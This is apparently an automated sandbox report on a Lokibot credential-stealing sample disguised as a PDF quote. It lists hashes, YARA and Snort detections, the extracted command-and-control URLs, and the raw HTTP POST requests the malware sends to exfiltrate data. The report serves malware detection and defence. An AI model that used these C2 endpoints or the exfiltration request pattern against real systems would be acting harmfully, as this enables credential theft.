Windows Analysis Report QUOTAZIONEpdf.exe

Overview

General Information

Sample Name: QUOTAZIONEpdf.exe
Analysis ID: 553085
MD5: 23b85c2f43b23b57411e4f4366a10b25
SHA1: 1511bfee72f99f691c93a1e6b070724890c6aea8
SHA256: 9ad929181f755701c0152618393ccff03e0499944c2e3f22fa2d0539347f5c45
Tags: exe, Loki

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Process Tree

  • System is w10x64
  • QUOTAZIONEpdf.exe (PID: 6352 cmdline: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" MD5: 23B85C2F43B23B57411E4F4366A10B25)
    • QUOTAZIONEpdf.exe (PID: 808 cmdline: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" MD5: 23B85C2F43B23B57411E4F4366A10B25)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://slimpackage.com/slimmain/five/fre.php"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13e80:$s2: https://
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://
00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp | Loki_1 | Loki Payload | kevoreilly
  • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x13ffc:$a2: last_compatible_version

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.QUOTAZIONEpdf.exe.3040000.4.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x13278:$s1: http://
  • 0x16233:$s1: http://
  • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13280:$s2: https://
  • 0x13278:$f1: http://
  • 0x16233:$f1: http://
  • 0x13280:$f2: https://
1.2.QUOTAZIONEpdf.exe.3040000.4.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
1.2.QUOTAZIONEpdf.exe.3040000.4.unpack | Loki_1 | Loki Payload | kevoreilly
  • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x133fc:$a2: last_compatible_version
1.2.QUOTAZIONEpdf.exe.3040000.4.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x123ff:$des3: 68 03 66 00 00
  • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13e80:$s2: https://
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://slimpackage.com/slimmain/five/fre.php"]}
Antivirus detection for URL or domain
Source: http://slimpackage.com/slimmain/five/fre.php, Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: slimpackage.com, Virustotal: Detection: 5%
Source: http://slimpackage.com/slimmain/five/fre.php, Virustotal: Detection: 8%
Machine Learning detection for sample
Source: QUOTAZIONEpdf.exe, Joe Sandbox ML: detected
Source: 2.0.QUOTAZIONEpdf.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen2
Source: QUOTAZIONEpdf.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP source: QUOTAZIONEpdf.exe, 00000001.00000003.292355502.0000000003210000.00000004.00000001.sdmp, QUOTAZIONEpdf.exe, 00000001.00000003.296307100.0000000003080000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: QUOTAZIONEpdf.exe, 00000001.00000003.292355502.0000000003210000.00000004.00000001.sdmp, QUOTAZIONEpdf.exe, 00000001.00000003.296307100.0000000003080000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe, Code function: 1_2_00405D7C FindFirstFileA,FindClose,1_2_00405D7C
Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe, Code function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_004053AA
Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe, Code function: 1_2_00402630 FindFirstFileA,1_2_00402630
Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe, Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49742 -> 104.223.93.105:80
Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 104.223.93.105:80
Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 104.223.93.105:80
Source: Traffic, Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49743 -> 104.223.93.105:80
Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 104.223.93.105:80
Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 104.223.93.105:80
Source: Traffic, Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49744 -> 104.223.93.105:80
Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 104.223.93.105:80
Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 104.223.93.105:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor, URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor, URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor, URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor, URLs: http://slimpackage.com/slimmain/five/fre.php
Source: Joe Sandbox View, ASN Name: ASN-QUADRANET-GLOBALUS
Source: Joe Sandbox View, IP Address: 104.223.93.105
Source: global traffic, HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 190 Connection: close
Source: global traffic, HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: CC3B1AE Content-Length: 163 Connection: close
          Source: global traffic, HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Fri, 14 Jan 2022 08:52:37 GMT
            Server: Apache
            Connection: close
            Content-Type: text/html; charset=UTF-8
            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
            Data Ascii: File not found.
          Source: global traffic, HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Fri, 14 Jan 2022 08:52:39 GMT
            Server: Apache
            Connection: close
            Content-Type: text/html; charset=UTF-8
            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
            Data Ascii: File not found.
          Source: QUOTAZIONEpdf.exe, String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: QUOTAZIONEpdf.exe, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp, String found in binary or memory: http://slimpackage.com/slimmain/five/fre.php
          Source: QUOTAZIONEpdf.exe, QUOTAZIONEpdf.exe, 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, QUOTAZIONEpdf.exe, 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, String found in binary or memory: http://www.ibsensoftware.com/
          Source: unknown, HTTP traffic detected:
            POST /slimmain/five/fre.php HTTP/1.0
            User-Agent: Mozilla/4.08 (Charon; Inferno)
            Host: slimpackage.com
            Accept: */*
            Content-Type: application/octet-stream
            Content-Encoding: binary
            Content-Key: CC3B1AE
            Content-Length: 190
            Connection: close
          Source: unknown, DNS traffic detected: queries for: slimpackage.com
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe, Code function: 2_2_00404ED4 recv, 2_2_00404ED4
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe, Code function: 1_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 1_2_00404F61

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Loki Payload, Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Loki Payload, Author: kevoreilly
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Loki Payload, Author: kevoreilly
          Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Loki Payload, Author: kevoreilly
          Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Loki Payload, Author: kevoreilly
          Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Loki Payload, Author: kevoreilly
          Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Loki Payload, Author: kevoreilly
          Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Loki Payload, Author: kevoreilly
          Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Lokibot in memory, Author: JPCERT/CC Incident Response Group
          Source: QUOTAZIONEpdf.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPE, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPE, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
